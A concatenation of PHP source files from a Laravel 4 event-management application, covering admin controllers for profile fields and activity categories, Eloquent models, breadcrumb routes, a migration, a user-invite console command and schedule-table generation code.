View::share('types', $types);
// Set up checker
$this->checkModel = 'ProfileField';
$this->checkMessage = 'messages.check_profileField';
}
/**
* Display a listing of the resource.
*
* @return Response
*/
public function index()
{
$profileFields = ProfileField::orderBy('sort_order')->orderBy('id')->get();
return View::make('admin.profileFields.index', compact('profileFields'));
}
/**
* Show the form for creating a new resource.
*
* @return Response
*/
public function create()
{
return View::make('admin.profileFields.create');
}
/**
* Store a newly created resource in storage.
*
* @return Response
*/
public function store()
{
$input = array_except(Input::all(), array('_method', '_token', 'events'));
$validation = Validator::make($input, ProfileField::$rules);
if ($validation->passes())
{
$this->profileField = ProfileField::create($input);
if (Input::has('events'))
{
$this->profileField->events()->sync(Input::get('events'));
}
return Redirect::action('AdminProfileFieldsController@index')
->with('success', Lang::get('messages.create_success', array('model' => ucfirst(Lang::get('labels.field')))));
}
return Redirect::action('AdminProfileFieldsController@create')
->withInput()
->withErrors($validation)
->with('error', Lang::get('messages.validation_error'));
}
/**
* Display the specified resource.
*
* @param int $id
* @return Response
*/
public function show($id)
{
$field = $this->profileField->findOrFail($id);
return View::make('admin.profileFields.show', compact('field'));
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return Response
*/
public function edit($id)
{
$field = $this->profileField->find($id);
if (is_null($field))
{
return Redirect::action('AdminProfileFieldsController@index')
->with('error', Lang::get('not_found', array('model' => Lang::get('labels.field'))));
}
$selected_events = array();
foreach($field->events as $event)
{
$selected_events[] = $event->id;
}
return View::make('admin.profileFields.edit', compact('field', 'selected_events'));
}
/**
* Update the specified resource in storage.
*
* @param int $id
* @return Response
*/
public function update($id)
{
$input = array_except(Input::all(), array('_method', '_token', '_old_name', 'events'));
if (!Input::has('visibility_control'))
{
$input['visibility_control'] = false;
}
$validation = Validator::make($input, ProfileField::$rules);
if ($validation->passes())
{
$profileField = ProfileField::find($id);
$profileField->update($input);
if (Input::has('events'))
{
$profileField->events()->sync(Input::get('events'));
}
return Redirect::action('AdminProfileFieldsController@show', $id)
->with('success', Lang::get('messages.update_success', array('model' => ucfirst(Lang::get('labels.field')))));
}
return Redirect::action('AdminProfileFieldsController@edit', $id)
->withInput()
->withErrors($validation)
->with('error', Lang::get('messages.validation_error'));
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return Response
*/
public function destroy($id)
{
$this->profileField->find($id)->delete();
if (Request::ajax())
{
return json_encode(true);
}
else
{
return Redirect::action('AdminProfileFieldsController@index')
->with('success', Lang::get('messages.destroy_success', array('model' => ucfirst(Lang::get('labels.field')))));
}
}
}
<file_sep><?php
use Cartalyst\Sentry\Users\Eloquent\User as SentryUserModel;
class User extends SentryUserModel {
public static $rules = array(
'name' => 'required|min:2',
// 'description' => 'required',
// 'capacity' => 'required',
// 'venue_id' => 'required'
);
public function events()
{
return $this->belongsToMany('ConEvent');
}
public function activities()
{
return $this->belongsToMany('Activity');
}
public function hosted()
{
return $this->belongsToMany('Activity', 'activity_user', 'user_id_host', 'activity_id');
}
public function country()
{
return $this->belongsTo('Country');
}
public function profileData()
{
return $this->hasMany('ProfileData');
}
}
<file_sep><?php
/**
* Breadcrumbs
*/
Breadcrumbs::setView('snippets.breadcrumbs');
/**
* Home
*/
Breadcrumbs::register('home', function($breadcrumbs)
{
$breadcrumbs->push(Lang::get('labels.home'), route('home'));
});
/**
* Users
*/
Breadcrumbs::register('user.index', function($breadcrumbs)
{
$breadcrumbs->parent('home');
$breadcrumbs->push(Lang::get('labels.users'), action('UsersController@getIndex'));
});
Breadcrumbs::register('user.show', function($breadcrumbs, $user) {
$breadcrumbs->parent('user.index');
$breadcrumbs->push($user->name, action('UsersController@getShow', $user->id));
});
Breadcrumbs::register('user.edit', function($breadcrumbs, $user)
{
$breadcrumbs->parent('user.show', $user);
$breadcrumbs->push(Lang::get('admin.edit'), action('UsersController@getEdit'));
});
/**
* Countries
*/
Breadcrumbs::register('country.index', function($breadcrumbs)
{
$breadcrumbs->parent('home');
$breadcrumbs->push('Countries', action('CountriesController@getIndex'));
});
Breadcrumbs::register('country.show', function($breadcrumbs, $country) {
$breadcrumbs->parent('country.index');
$breadcrumbs->push($country->name, action('CountriesController@getShow', $country->id));
});
/**
* Events
*/
Breadcrumbs::register('event.index', function($breadcrumbs)
{
$breadcrumbs->parent('home');
$breadcrumbs->push(Lang::get('labels.events'), action('ConEventsController@getIndex'));
});
Breadcrumbs::register('event.show', function($breadcrumbs, $event) {
$breadcrumbs->parent('home');
$breadcrumbs->push($event->name, action('ConEventsController@getShow', $event->id));
});
Breadcrumbs::register('event.schedule', function($breadcrumbs, $event) {
$breadcrumbs->parent('event.show', $event);
$breadcrumbs->push(Lang::get('labels.schedule'), action('ConEventsController@getSchedule', $event->id));
});
Breadcrumbs::register('event.participants', function($breadcrumbs, $event) {
$breadcrumbs->parent('event.show', $event);
$breadcrumbs->push(Lang::get('labels.participants'), action('ConEventsController@getParticipants', $event->id));
});
Breadcrumbs::register('event.activity', function($breadcrumbs, $event, $activity) {
$breadcrumbs->parent('event.show', $event);
$breadcrumbs->push($activity->name, action('ActivitiesController@getShow', $activity->id));
});
Breadcrumbs::register('event.activity.participants', function($breadcrumbs, $event, $activity) {
$breadcrumbs->parent('event.activity', $event, $activity);
$breadcrumbs->push(Lang::get('labels.participants'), action('ActivitiesController@getParticipants', $activity->id));
});
/**
* Venues
*/
Breadcrumbs::register('venue.index', function($breadcrumbs)
{
$breadcrumbs->parent('home');
$breadcrumbs->push('Venues', action('VenuesController@getIndex'));
});
Breadcrumbs::register('venue.show', function($breadcrumbs, $venue) {
$breadcrumbs->parent('venue.index');
$breadcrumbs->push($venue->name, action('VenuesController@getShow', $venue->id));
});
/**
* Admin
*/
/**
* Home
*/
Breadcrumbs::register('admin.home', function($breadcrumbs)
{
$breadcrumbs->push('Admin', action('AdminController@getIndex'));
});
/**
* Events
*/
Breadcrumbs::register('admin.event.index', function($breadcrumbs)
{
$breadcrumbs->parent('admin.home');
$breadcrumbs->push(Lang::get('labels.events'), action('AdminConEventsController@index'));
});
Breadcrumbs::register('admin.event.create', function($breadcrumbs)
{
$breadcrumbs->parent('admin.event.index');
$breadcrumbs->push(Lang::get('admin.create'), action('AdminConEventsController@create'));
});
Breadcrumbs::register('admin.event.show', function($breadcrumbs, $event) {
$breadcrumbs->parent('admin.event.index');
$breadcrumbs->push($event->name, action('AdminConEventsController@show', $event->id));
});
Breadcrumbs::register('admin.event.edit', function($breadcrumbs, $event)
{
$breadcrumbs->parent('admin.event.show', $event);
$breadcrumbs->push(Lang::get('admin.edit'), action('AdminConEventsController@edit'));
});
/**
* Venues
*/
Breadcrumbs::register('admin.venue.index', function($breadcrumbs)
{
$breadcrumbs->parent('admin.home');
$breadcrumbs->push(Lang::get('labels.venue'), action('AdminVenuesController@index'));
});
Breadcrumbs::register('admin.venue.create', function($breadcrumbs)
{
$breadcrumbs->parent('admin.venue.index');
$breadcrumbs->push(Lang::get('admin.create'), action('AdminVenuesController@create'));
});
Breadcrumbs::register('admin.venue.show', function($breadcrumbs, $venue) {
$breadcrumbs->parent('admin.venue.index');
$breadcrumbs->push($venue->name, action('AdminVenuesController@show', $venue->id));
});
Breadcrumbs::register('admin.venue.edit', function($breadcrumbs, $venue)
{
$breadcrumbs->parent('admin.venue.show', $venue);
$breadcrumbs->push(Lang::get('admin.edit'), action('AdminVenuesController@edit'));
});
/**
* Rooms
*/
Breadcrumbs::register('admin.room.index', function($breadcrumbs)
{
$breadcrumbs->parent('admin.home');
$breadcrumbs->push(Lang::get('labels.room'), action('AdminRoomsController@index'));
});
Breadcrumbs::register('admin.room.create', function($breadcrumbs)
{
$breadcrumbs->parent('admin.room.index');
$breadcrumbs->push(Lang::get('admin.create'), action('AdminRoomsController@create'));
});
Breadcrumbs::register('admin.room.show', function($breadcrumbs, $room) {
$breadcrumbs->parent('admin.room.index');
$breadcrumbs->push($room->name, action('AdminRoomsController@show', $room->id));
});
Breadcrumbs::register('admin.room.edit', function($breadcrumbs, $room)
{
$breadcrumbs->parent('admin.room.show', $room);
$breadcrumbs->push(Lang::get('admin.edit'), action('AdminRoomsController@edit'));
});
/**
* Users
*/
Breadcrumbs::register('admin.user.index', function($breadcrumbs)
{
$breadcrumbs->parent('admin.home');
$breadcrumbs->push(Lang::get('labels.users'), action('AdminUsersController@index'));
});
Breadcrumbs::register('admin.user.create', function($breadcrumbs)
{
$breadcrumbs->parent('admin.user.index');
$breadcrumbs->push(Lang::get('admin.create'), action('AdminUsersController@create'));
});
Breadcrumbs::register('admin.user.import', function($breadcrumbs)
{
$breadcrumbs->parent('admin.user.index');
$breadcrumbs->push(Lang::get('admin.import'), action('AdminUsersController@create'));
});
Breadcrumbs::register('admin.user.show', function($breadcrumbs, $user) {
$breadcrumbs->parent('admin.user.index');
$breadcrumbs->push($user->name, action('AdminUsersController@show', $user->id));
});
Breadcrumbs::register('admin.user.edit', function($breadcrumbs, $user)
{
$breadcrumbs->parent('admin.user.show', $user);
$breadcrumbs->push(Lang::get('admin.edit'), action('AdminUsersController@edit'));
});
/**
* Profile Fields
*/
Breadcrumbs::register('admin.field.index', function($breadcrumbs)
{
$breadcrumbs->parent('admin.home');
$breadcrumbs->push(Lang::get('labels.fields'), action('AdminProfileFieldsController@index'));
});
Breadcrumbs::register('admin.field.create', function($breadcrumbs)
{
$breadcrumbs->parent('admin.field.index');
$breadcrumbs->push(Lang::get('admin.create'), action('AdminProfileFieldsController@create'));
});
Breadcrumbs::register('admin.field.show', function($breadcrumbs, $profileField) {
$breadcrumbs->parent('admin.field.index');
$breadcrumbs->push($profileField->name, action('AdminProfileFieldsController@show', $profileField->id));
});
Breadcrumbs::register('admin.field.edit', function($breadcrumbs, $profileField)
{
$breadcrumbs->parent('admin.field.show', $profileField);
$breadcrumbs->push(Lang::get('admin.edit'), action('AdminProfileFieldsController@edit'));
});
/**
* Activities
*/
Breadcrumbs::register('admin.activity.index', function($breadcrumbs)
{
$breadcrumbs->parent('admin.home');
$breadcrumbs->push(Lang::get('labels.activity'), action('AdminActivitiesController@index'));
});
Breadcrumbs::register('admin.activity.create', function($breadcrumbs)
{
$breadcrumbs->parent('admin.activity.index');
$breadcrumbs->push(Lang::get('admin.create'), action('AdminActivitiesController@create'));
});
Breadcrumbs::register('admin.activity.show', function($breadcrumbs, $activity) {
$breadcrumbs->parent('admin.activity.index');
$breadcrumbs->push($activity->name, action('AdminActivitiesController@show', $activity->id));
});
Breadcrumbs::register('admin.activity.edit', function($breadcrumbs, $activity)
{
$breadcrumbs->parent('admin.activity.show', $activity);
$breadcrumbs->push(Lang::get('admin.edit'), action('AdminActivitiesController@edit'));
});
/**
* Activity Categories
*/
Breadcrumbs::register('admin.activityCategory.index', function($breadcrumbs)
{
$breadcrumbs->parent('admin.home');
$breadcrumbs->push(Lang::get('labels.activity_categories'), action('AdminActivityCategoriesController@index'));
});
Breadcrumbs::register('admin.activityCategory.create', function($breadcrumbs)
{
$breadcrumbs->parent('admin.activityCategory.index');
$breadcrumbs->push(Lang::get('admin.create'), action('AdminActivityCategoriesController@create'));
});
Breadcrumbs::register('admin.activityCategory.show', function($breadcrumbs, $profileField) {
$breadcrumbs->parent('admin.activityCategory.index');
$breadcrumbs->push($profileField->name, action('AdminActivityCategoriesController@show', $profileField->id));
});
Breadcrumbs::register('admin.activityCategory.edit', function($breadcrumbs, $profileField)
{
$breadcrumbs->parent('admin.activityCategory.show', $profileField);
$breadcrumbs->push(Lang::get('admin.edit'), action('AdminActivityCategoriesController@edit'));
});
<file_sep><?php
class ActivityCategory extends BaseModel {
protected $guarded = array();
public static $rules = array(
'name' => 'required',
'name_translation' => 'required',
'color' => 'required',
'text_color' => 'required'
);
public function activities()
{
return $this->hasMany('Activity');
}
public function rgbaColor($opacity = 1)
{
$color = $this->color;
$default = 'rgb(0,0,0)';
//Return default if no color provided
if (empty($color)) {
return $default;
}
//Sanitize $color if "#" is provided
if ($color[0] == '#' ) {
$color = substr( $color, 1 );
}
//Check if color has 6 or 3 characters and get values
if (strlen($color) == 6) {
$hex = array( $color[0] . $color[1], $color[2] . $color[3], $color[4] . $color[5] );
} elseif ( strlen( $color ) == 3 ) {
$hex = array( $color[0] . $color[0], $color[1] . $color[1], $color[2] . $color[2] );
} else {
return $default;
}
//Convert hexadec to rgb
$rgb = array_map('hexdec', $hex);
//Check if opacity is set(rgba or rgb)
if($opacity){
if(abs($opacity) > 1)
$opacity = 1.0;
$output = 'rgba('.implode(",",$rgb).','.$opacity.')';
} else {
$output = 'rgb('.implode(",",$rgb).')';
}
//Return rgb(a) color string
return $output;
}
public function textColor()
{
// returns brightness value from 0 to 255
// strip off any leading #
$hex = str_replace('#', '', $this->color);
$c_r = hexdec(substr($hex, 0, 2));
$c_g = hexdec(substr($hex, 2, 2));
$c_b = hexdec(substr($hex, 4, 2));
$contrast = (($c_r * 299) + ($c_g * 587) + ($c_b * 114)) / 1000;
return $contrast > 130 ? 'black' : 'white';
}
}
<file_sep><?php
class ProfileData extends BaseModel
{
protected $table = 'profile_data';
protected $guarded = array();
public static $rules = array();
public function user()
{
return $this->belongsTo('User');
}
public function field()
{
return $this->belongsTo('ProfileField');
}
}
<file_sep><?php
class AdminActivityCategoriesController extends BaseController {
/**
* ActivityCategory Repository
*
* @var ActivityCategory
*/
protected $ActivityCategory;
public function __construct(ActivityCategory $activityCategory)
{
$this->ActivityCategory = $activityCategory;
$this->events = array();
foreach(ConEvent::all() as $event) {
$this->events[$event->id] = $event->name;
}
$this->users = array();
foreach(User::all() as $user) {
$this->users[$user->id] = $user->name ? $user->name : $user->email;
}
}
/**
* Display a listing of the resource.
*
* @return Response
*/
public function index()
{
$activityCategories = ActivityCategory::all();
return View::make('admin.activityCategories.index', compact('activityCategories'));
}
/**
* Show the form for creating a new resource.
*
* @return Response
*/
public function create()
{
$events = $this->events;
$users = $this->users;
return View::make('admin.activityCategories.create', compact('events', 'users'));
}
/**
* Store a newly created resource in storage.
*
* @return Response
*/
public function store()
{
// $input = Input::all();
$input = array_except(Input::all(), array('_method', '_token'));
$validation = Validator::make($input, ActivityCategory::$rules);
if ($validation->passes())
{
$activityCategory = ActivityCategory::create($input);
return Redirect::action('AdminActivityCategoriesController@index')
->with('success', Lang::get('messages.create_success', array('model' => ucfirst(Lang::get('labels.activity_category')))));
}
return Redirect::action('AdminActivityCategoriesController@create')
->withInput()
->withErrors($validation)
->with('error', Lang::get('messages.validation_error'));
}
/**
* Display the specified resource.
*
* @param int $id
* @return Response
*/
public function show($id)
{
$activityCategory = $this->ActivityCategory->findOrFail($id);
// dd($activityCategory->count());
return View::make('admin.activityCategories.show', compact('activityCategory'));
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return Response
*/
public function edit($id)
{
$activityCategory = $this->ActivityCategory->find($id);
if (is_null($activityCategory))
{
return Redirect::action('AdminActivityCategoriesController@index');
}
$users = $this->users;
$events = $this->events;
return View::make('admin.activityCategories.edit', compact('activityCategory', 'events', 'users'));
}
/**
* Update the specified resource in storage.
*
* @param int $id
* @return Response
*/
public function update($id)
{
$input = array_except(Input::all(), array('_method', '_token'));
$validation = Validator::make($input, ActivityCategory::$rules);
if ($validation->passes())
{
$activityCategory = ActivityCategory::find($id);
$activityCategory->update($input);
// if (Input::has('hosts'))
// {
// $hosts = array();
// foreach (Input::get('hosts') as $host) {
// $hosts[$host] = array('host' => true);
// }
// $user->ActivityCategory->hosts()->sync($hosts);
// }
// if (Input::has('participants'))
// {
// $user->ActivityCategory->hosts()->sync(Input::get('participants'));
// }
return Redirect::action('AdminActivityCategoriesController@show', $id)
->with('success', Lang::get('messages.update_success', array('model' => ucfirst(Lang::get('labels.activity_category')))));
}
return Redirect::action('AdminActivityCategoriesController@edit', $id)
->withInput()
->withErrors($validation)
->with('message', Lang::get('messages.validation_error'));
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return Response
*/
public function destroy($id)
{
$this->ActivityCategory->find($id)->delete();
return Redirect::action('AdminActivityCategoriesController@index');
}
}
<file_sep><?php
class BaseModel extends Eloquent {
/**
* Formats a database timestamp with Carbon
* @param string $value Date fetched from database
* @param string $format Date format in PHP date syntax
* @return Carbon Carbon date object
*/
protected function getTimestampAs($value, $format = 'Y-m-d H:i')
{
return \Carbon\Carbon::createFromFormat('Y-m-d H:i:s', $value)->format($format);
}
static function toFlatArray($first = null, $value = 'name', $key = 'id')
{
$array = array();
if (isset($first))
{
$array[] = $first;
}
foreach (self::all() as $item)
{
$array[$item->$key] = $item->$value;
}
return $array;
}
}
<file_sep><?php
return array
(
'signup_full' => 'Activity has no places left for sign-up.',
'capacity' => 'This activity can take :capacity participants.',
'signup_capacity' => ':left of :capacity spots for sign-up left.',
'signup_closed' => 'Sign-up for this activity is closed.',
'signup_open' => 'Sign-up for this activity is open.',
);
<file_sep><?php
use Illuminate\Database\Migrations\Migration;
use Illuminate\Database\Schema\Blueprint;
class CreateActivityCategoriesTable extends Migration {
/**
* Run the migrations.
*
* @return void
*/
public function up()
{
Schema::create('activity_categories', function(Blueprint $table) {
$table->increments('id');
$table->string('name');
$table->string('name_translation');
$table->string('color')->default('#eee');
$table->string('text_color')->default('#000');
$table->text('description')->nullable();
$table->string('description_translation')->nullable();
$table->timestamps();
});
}
/**
* Reverse the migrations.
*
* @return void
*/
public function down()
{
Schema::drop('activity_categories');
}
}
<file_sep><?php
class ActivitiesController extends BaseController
{
public function __construct()
{
$this->beforeFilter('auth', array('only' => array('getSignUp')));
$this->beforeFilter('auth|admin', array('only' => array('getParticipants')));
parent::__construct();
}
/**
* Display the specified resource or listing.
*
* @param int $id
* @return Response
*/
public function getIndex($id = null)
{
$activities = Activity::all();
$page_title = Lang::get('labels.activities');
return View::make('activities.index', compact('activities', 'page_title'));
}
public function getShow($id)
{
try
{
$activity = Activity::findOrFail($id);
$page_title = $activity->name;
return View::make('activities.show', compact('activity', 'page_title'));
}
catch (Exception $e)
{
return Redirect::action('HomeController@index')->with('error', $e->getMessage());
}
}
public function getSignUp($activity, $action)
{
try
{
$user = Sentry::getUser();
$activity = Activity::find($activity);
if (!$activity->open)
{
$return = Redirect::back()->with('error', Lang::get('messages.error_activity_not_open'));
}
else
{
if ($action === 'join')
{
if ($activity->hasPlacesLeft())
{
$user->activities()->attach($activity->id);
$return = Redirect::back()
->with('success', Lang::get('messages.success_activity_joined', array('activity' => $activity->name)) );
}
else
{
$return = Redirect::back()
->with('error', Lang::get('messages.error_activity_full', array('activity' => $activity->name)) );
}
}
else
{
$user->activities()->detach($activity->id);
$return = Redirect::back()
->with('success', Lang::get('messages.success_activity_left', array('activity' => $activity->name)));
}
}
}
catch(Exception $e)
{
return Redirect::back()
->with('error', $e->getMessage());
}
return $return;
}
public function getParticipants($id)
{
try
{
$activity = Activity::findOrFail($id);
$page_title = $activity->name;
$participants = $activity->participants;
return View::make('activities.participants', compact('activity', 'participants', 'page_title'));
}
catch (Exception $e)
{
return Redirect::action('HomeController@index')->with('error', $e->getMessage());
}
}
}
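getSignUp() above gates joins on Activity::hasPlacesLeft(), which is not shown in this chunk. A minimal sketch of what such a check could look like, assuming (per the signup_limit_help language string elsewhere in this codebase) that a fraction of the capacity is opened for sign-up, rounded down. The function name and signature here are illustrative, not the project's actual API:

```php
<?php
// Hypothetical sketch of a capacity check like Activity::hasPlacesLeft().
// $signupLimit is the fraction of total capacity open for sign-up
// (0.5 = 50%, 1.0 = 100%), rounded down per the signup_limit_help text.
function hasPlacesLeft($capacity, $signupLimit, $currentParticipants)
{
    $openPlaces = (int) floor($capacity * $signupLimit);
    return $currentParticipants < $openPlaces;
}
```

With a capacity of 10 and a limit of 0.5, the fifth participant fills the last open spot and later attempts are rejected.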
<file_sep><?php
use Illuminate\Console\Command;
use Symfony\Component\Console\Input\InputOption;
use Symfony\Component\Console\Input\InputArgument;
class userInvite extends Command {
/**
* The console command name.
*
* @var string
*/
protected $name = 'user:invite';
/**
* The console command description.
*
* @var string
*/
protected $description = 'Invite user';
/**
* Create a new command instance.
*
* @return void
*/
public function __construct()
{
parent::__construct();
}
/**
* Execute the console command.
*
* @return mixed
*/
public function fire()
{
try
{
$email = $this->argument('email');
$user = Sentry::findUserByLogin($email);
$email = $user->email;
$name = $user->name;
$password = <PASSWORD>(8);
$resetCode = $user->getResetPasswordCode();
if ($user->checkResetPasswordCode($resetCode))
{
if ($user->attemptResetPassword($resetCode, $password))
{
Mail::send('emails.auth.invite', compact('email', 'name', 'password'), function($message) use ($email, $name)
{
$message->to($email, $name)->subject(Lang::get('emails.subject.invite', array('app' => Lang::get('app.name'))));
});
$user->invited = true;
$user->save();
$this->info('User was successfully invited!');
}
else
{
$this->error('Could not invite user!');
}
}
else
{
$this->error('Could not invite user!');
}
}
catch (Cartalyst\Sentry\Users\UserNotFoundException $e)
{
$this->error('User does not exist!');
}
}
/**
* Get the console command arguments.
*
* @return array
*/
protected function getArguments()
{
return array(
array('email', InputArgument::REQUIRED, 'User email'),
);
}
/**
* Get the console command options.
*
* @return array
*/
protected function getOptions()
{
return array();
}
}
<file_sep><?php
class Country extends BaseModel {
protected $guarded = array();
public static $rules = array();
static function formList()
{
$countries = array('Select Country');
foreach (Country::all() as $country)
{
$countries[$country->id] = $country->name;
}
return $countries;
}
public function users()
{
return $this->hasMany('User');
}
public function getUserCountAttribute($value)
{
$value = $this->users->count();
return $value;
}
}
<file_sep><?php
class ProfileField extends BaseModel {
protected $guarded = array();
public static $rules = array(
'name' => 'required',
'sort_order' => 'required|integer|min:0',
'relation_table' => 'required_if:type,relation'
);
public function values()
{
return $this->hasMany('ProfileValue');
}
public function events()
{
return $this->belongsToMany('ConEvent');
}
public function getOptionsArrayAttribute($value)
{
if ($this->options)
{
$value = array('');
foreach(json_decode($this->options) as $option)
{
$value[$option] = $option;
}
}
return $value;
}
public function getFormNameAttribute($value)
{
$value = sprintf('field_%s_%s', $this->type, $this->id);
return $value;
}
public function getFormVisibilityAttribute($value)
{
$value = sprintf('field_%s_%s_visibility', $this->type, $this->id);
return $value;
}
}
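The getOptionsArrayAttribute() accessor above expands a JSON-encoded option list into a value => value map with a leading blank entry, so "nothing selected" stays representable in a select box. The same transformation as a standalone sketch (the real accessor returns its original argument when no options are set):

```php
<?php
// Standalone sketch of ProfileField::getOptionsArrayAttribute(): decode
// a JSON list of options into a value => value map, prefixed with an
// empty entry for the "no selection" case.
function optionsToSelectArray($optionsJson)
{
    $value = array('');
    if ($optionsJson) {
        foreach (json_decode($optionsJson) as $option) {
            $value[$option] = $option;
        }
    }
    return $value;
}
```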
<file_sep><?php
class ConEvent extends BaseModel
{
protected $guarded = array();
public static $rules = array(
'name' => 'required',
'description' => 'required'
);
public function category()
{
return $this->belongsTo('ConEventCategory');
}
public function activities()
{
return $this->hasMany('Activity');
}
public function venue()
{
return $this->belongsTo('Venue');
}
public function participants()
{
return $this->belongsToMany('User');
}
public function getStartsAtAttribute($value)
{
return \Carbon\Carbon::createFromFormat('Y-m-d H:i:s', $value);
}
public function getEndsAtAttribute($value)
{
return \Carbon\Carbon::createFromFormat('Y-m-d H:i:s', $value);
}
public function profileFields()
{
return $this->belongsToMany('ProfileField');
}
}
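The starts_at / ends_at accessors above parse the database's 'Y-m-d H:i:s' strings into Carbon objects so controllers can call diffInDays(), copy(), addDays(), and so on. The core parsing step, sketched with plain DateTime standing in for Carbon (the sample timestamps are made up):

```php
<?php
// Sketch of the starts_at / ends_at accessors without Carbon: the
// database hands back 'Y-m-d H:i:s' strings and the accessor turns them
// into date objects for interval arithmetic.
function parseTimestamp($value)
{
    return DateTime::createFromFormat('Y-m-d H:i:s', $value);
}

$start = parseTimestamp('2014-07-24 10:00:00');
$end   = parseTimestamp('2014-07-27 18:00:00');
$days  = $start->diff($end)->days; // whole days between the two, like diffInDays()
```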
<file_sep><?php
class VenuesController extends BaseController
{
/**
* Display the specified resource or listing.
*
* @param int $id
* @return Response
*/
public function getIndex($id = null)
{
$venues = Venue::all();
return View::make('venues.index', compact('venues'));
}
public function getShow($id)
{
try
{
$venue = Venue::findOrFail($id);
}
catch (Exception $e)
{
return Redirect::action('VenuesController@getIndex')->with('error', Lang::get('venues.error_not_found'));
}
return View::make('venues.show', compact('venue'));
}
}
<file_sep><?php
class ConEventsController extends BaseController
{
public function __construct()
{
$this->beforeFilter('auth', array('except' => array('getIndex', 'getShow', 'getSchedule')));
parent::__construct();
}
/**
* Display the specified resource or listing.
*
* @param int $id
* @return Response
*/
public function getIndex($id = null)
{
$page = Input::has('page') ? Input::get('page') : '1';
$sort = Input::has('sort') ? Input::get('sort') : 'starts_at';
$order = Input::has('order') ? Input::get('order') : 'desc';
$page_title = Lang::get('labels.events');
$events = ConEvent::orderBy($sort, $order)->paginate(15);
return View::make('events.index', compact('events', 'sort', 'order', 'page', 'page_title'));
}
public function getShow($id)
{
try
{
$page = Input::has('page') ? Input::get('page') : '1';
$sort = Input::has('sort') ? Input::get('sort') : 'name';
$order = Input::has('order') ? Input::get('order') : 'asc';
$event = ConEvent::findOrFail($id);
$users = $event->participants()->orderBy($sort, $order)->paginate(15);
$page_title = $event->name;
$day = false;
$time = false;
return View::make('events.show', compact('event', 'users', 'sort', 'order', 'page', 'day', 'time', 'page_title'));
}
catch (Exception $e)
{
return Redirect::back()->with('error', $e->getMessage());
}
}
public function getMyActivities($id)
{
try
{
$event = ConEvent::findOrFail($id);
$activities = array();
$user = Sentry::getUser();
foreach ($event->activities()->orderBy('starts_at', 'asc')->get() as $activity)
{
if ($activity->participants()->where('user_id', '=', $user->id)->count())
{
$activities[] = $activity;
}
}
$page_title = $event->name;
$day = false;
$time = false;
return View::make('events.my-activities', compact('event', 'activities', 'day', 'time', 'page_title'));
}
catch (Exception $e)
{
return Redirect::back()->with('error', $e->getMessage());
}
}
public function getParticipants($id)
{
try
{
$page = Input::has('page') ? Input::get('page') : '1';
$sort = Input::has('sort') ? Input::get('sort') : 'name';
$order = Input::has('order') ? Input::get('order') : 'asc';
$event = ConEvent::findOrFail($id);
$users = $event->participants()->orderBy($sort, $order)->paginate(20);
$page_title = $event->name;
$day = false;
$time = false;
$countries = array();
foreach ($event->participants as $participant)
{
if (!in_array($participant->country_id, $countries))
{
$countries[] = $participant->country_id;
}
}
$countries = sizeof($countries);
return View::make('events.participants', compact('event', 'users', 'sort', 'order', 'page', 'day', 'time','countries', 'page_title'));
}
catch (Exception $e)
{
return Redirect::back()->with('error', $e->getMessage());
}
}
public function getSignUp($event, $action)
{
try {
$event = ConEvent::find($event);
if (!$event->open) {
$return = Redirect::back()->with('error', Lang::get('events.error_not_open'));
}
else {
if ($action === 'join') {
$this->user->events()->attach($event->id);
$return = Redirect::back()
->with('success', Lang::get('events.success_joined', array('event' => $event->name)) );
}
else {
$this->user->events()->detach($event->id);
$return = Redirect::back()
->with('success', Lang::get('events.success_left', array('event' => $event->name)));
}
}
}
catch(Exception $e) {
return Redirect::back()
->with('error', 'Event sign up failed!');
}
return $return;
}
public function getSchedule($eventId)
{
try
{
$event = ConEvent::find($eventId);
$user = Sentry::check() ? Sentry::getUser() : false;
$rooms = $event->venue->rooms()->orderBy('id')->get();
$rooms2 = array();
$roomRows = array();
foreach($rooms as $room)
{
if (Activity::where('room_id', '=', $room->id)->count())
{
$rooms2[] = $room;
$roomRows[$room->id] = 1;
}
}
$rooms = $rooms2;
$days = array();
$length = $event->starts_at->diffInDays($event->ends_at)+1;
for ($i = 0; $i < $length; $i++)
{
$date = $event->starts_at->copy()->addDays($i);
$date->hour = 0;
$date->minute = 0;
$date->second = 0;
$activities = Activity::getForDate($date, $event);
$table = array();
$firstTime = $event->ends_at->copy()->addDay();
$firstTime->hour = 0;
$firstTime->minute = 0;
$firstTime->second = 0;
$lastTime = $event->starts_at->copy();
$lastTime->hour = 0;
$lastTime->minute = 0;
$lastTime->second = 0;
foreach ($activities as $activity)
{
if ($activity->starts_at < $firstTime)
{
$firstTime = $activity->starts_at;
}
if ($activity->ends_at > $lastTime)
{
$lastTime = $activity->ends_at;
}
}
$currentTime = $firstTime->copy();
$rowspans = array();
$row = array('<th> </th>');
foreach ($rooms as $room)
{
$row[] = sprintf('<th style="width:%d%%">%s</th>', (1/sizeof($rooms))*100, $room->name);
$rowspans[$room->id] = 1;
}
$table[] = $row;
$categories = array();
while ($currentTime <= $lastTime)
{
$row = array();
$row[0] = sprintf('<td>%s</td>', $currentTime->format('H:i'));
if ($activity = Activity::where('con_event_id', '=', $event->id)->where('all_rooms', '=', true)->where('starts_at', '=', $currentTime->format('Y-m-d H:i:s'))->first())
{
$rowspan = ceil($activity->getDuration(false)/60);
foreach ($rooms as $room)
{
$rowspans[$room->id] = $rowspan;
}
if ($activity->category && !in_array($activity->category, $categories))
{
$categories[] = $activity->category;
}
$cell = "";
if ($activity->category)
{
// $cell .= "<span class=\"glyphicon glyphicon-tag\" title=\"{$activity->category->name}\"></span> ";
}
if ($user && $activity->participants()->where('user_id', '=', $user->id)->count())
{
$name = sprintf('<span class="glyphicon glyphicon-asterisk" title="%s"></span> %s', Lang::get('messages.signed_up'), $activity->name);
}
else {
$name = $activity->name;
}
$cell .= sprintf('<a href="%s">%s</a>', action('ActivitiesController@getShow', $activity->id), $name);
$cell .= sprintf('<div class="duration">%s</div>', $activity->getDuration());
$row[] = sprintf('<td rowspan="%d" colspan="%d" class="active %s" style="background-color:%s;">%s</td>',
$rowspan,
sizeof($rooms),
$activity->category->textColor(),
$activity->category->color,
$cell
);
}
else
{
foreach ($rooms as $room)
{
$rowspan = 1;
$class = '';
if ($activity = Activity::where('room_id', '=', $room->id)->where('starts_at', '=', $currentTime->format('Y-m-d H:i:s'))->first())
{
$rowspan = ceil($activity->getDuration(false)/60);
$rowspans[$room->id] = $rowspan;
if ($activity->category && !in_array($activity->category, $categories))
{
$categories[] = $activity->category;
